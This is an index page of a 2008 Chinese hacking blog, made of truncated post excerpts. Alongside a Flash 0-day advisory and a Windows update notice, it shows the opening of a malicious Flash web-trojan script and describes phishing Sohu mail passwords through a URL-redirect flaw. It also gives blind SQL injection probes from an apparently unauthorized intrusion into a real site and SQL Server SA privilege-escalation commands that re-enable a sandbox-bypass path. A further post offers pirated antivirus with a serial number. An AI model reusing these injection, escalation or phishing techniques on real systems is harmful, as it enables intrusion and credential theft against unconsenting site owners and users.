May302008

    对最新flash-0day网马分析!

    对最新flash-0day网马分析!
    <script> window.onerror=function(){return true;} function init(){window.status="";}window.onload = init; if(document.cookie.indexOf("play=")==-1){ var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie="play=Yes;path=/;expires="+expires.toGMTString(); if(navigator.userAgent.toLowerCase().in...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, , ,
    抢沙发
    May302008

    利用sohu网站URL跳转漏洞欺骗邮箱密码

    利用sohu网站URL跳转漏洞欺骗邮箱密码
    作者:空虚浪子心[XGC] url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passport.sohu.com/web/signup.jsp?appid=1000& ru=http://login.mail.sohu.com/reg/signup_success.jsp。 这串字符中的“signup_success.jsp”页面是做什么的呢?反正sohu...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, , , , , , ,
    抢沙发
    May292008

    综合检测某成人站的临时笔记

    综合检测某成人站的临时笔记
    unix+apache+php+mysql 21=vsftpd;22=ssh;mysql=3306不开放远程连接 找到个注射点,mysql版本4.0以上支持union查询,当前用户权限足够可以load_file 以下是记录: /gongji.php?ag_id=7 and ord(mid(version(),1,1))>51      /*判断mysql version的第一位是不是大于3 /gongji.php?ag_id=7 and (select count(*) from mysql.user)>0  /*判断权限 /go...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:
    抢沙发
    May282008

    大家请尽快将Flash Player升级到9.0.124

    大家请尽快将Flash Player升级到9.0.124
    新闻来源:cbmland.com 今天取到了一份swf格式的exploits,测试了一下在Flash Player 9 .0.115的结果。 Adobe Flash Player 9 .0.115 在播放恶意构造的swf时,会自动下载一个可执行文件并执行,而我拿到的这个swf文件会自动下载一个downloader并运行,然后再由这个downloader下载其他预先指定的木马程序,相当的危险。 这个漏洞出现在Adobe Flash Player 9 .0.115和更早版本,其实早在4月8号...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, ,
    抢沙发
    May282008

    Windows XP SP3 更新 KB951830

    Windows XP SP3 更新 KB951830
    安装本更新程序可以解决在运行 Windows XP Service Pack 3 的系统上连接/断开连接或禁用/启用网络适配器之后,客户端无法解析 DNS 的问题. 安装本更新程序之后,可能必须重新启动计算机. 快速详细信息 文件名: WindowsXP-KB951830-x86-CHS.exe 版本: 951830 知识库 (KB) 文章: KB951830 发布日期: 2008/5/26 语言: 简体中文 下载大小: 607 KB 支持的操作系统: Windows ...阅读全文
    作者:天晴 | 分类:Other | 阅读: | 标签:, , ,
    抢沙发
    May262008

    AVG Anti-Virus Professional Edition v8.0.93a Build 附序列号

    AVG Anti-Virus Professional Edition v8.0.93a Build 附序列号
    AVG Anti-Virus System功能上相当完整,可即时对任何存取文件侦测,防止电脑病毒感染;可对电子邮件和附加文件进行扫瞄,防止电脑病毒透过电子邮件和附加文件传播;『病毒资料库』里面则记录了一些电脑病毒的特性和发作**期等相关资讯;『开机保护』可在电脑开机时侦测开机型病毒,防止开机型病毒感染。 * 100%病毒侦测 因为它对"野生"病毒的优秀侦查,AVG的扫描引擎屡获殊荣,包...阅读全文
    作者:天晴 | 分类:Soft | 阅读: | 标签:,
    抢沙发
    May262008

    关于本博客弹出广告 实属无奈 不便还请见谅!

    关于本博客弹出广告 实属无奈 不便还请见谅!
    弹出的广告是空间供应商强制的 没办法用人家的空间就是这样 我想过用代码强制去掉那个广告 但是如果我这样做的话 很可能我会失去这个空间 为了保证本博客的稳定性 (本人现在还是学生无收入所以 一般的收费空间 条件太差无保障 博客虽然放了GG的广告 但是点击率不搞所以……..) 呵呵 所以 希望朋友们能够谅解!! 阅读全文
    作者:天晴 | 分类:Diary | 阅读: | 标签:,
    3条评论
    May252008

    零距离感受综合入侵检测服务器过程

    零距离感受综合入侵检测服务器过程
    文章来源:网络 很多网上安全教程都介绍了如何通过百度和google来搜索漏洞代码而发动攻击,这种文章在实际应用中没有什么价值, 毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。 只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技术, 今天笔者就从实际出发带领各位IT168读者学习针对某固定服务器的扫描入侵一条龙操作,让读者对攻...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, ,
    抢沙发
    May252008

    一次SA权限入侵和小议SA提权

    一次SA权限入侵和小议SA提权
    试在NB里面恢复CMDSHELL、OACREAT都没有成功,所以开启SQLSERVERAGENT ;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';–   还是没有成功,无奈之中希望寄托于沙盒模式,执行如下语句开启沙盒模式 ;execmaster..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, , ,
    抢沙发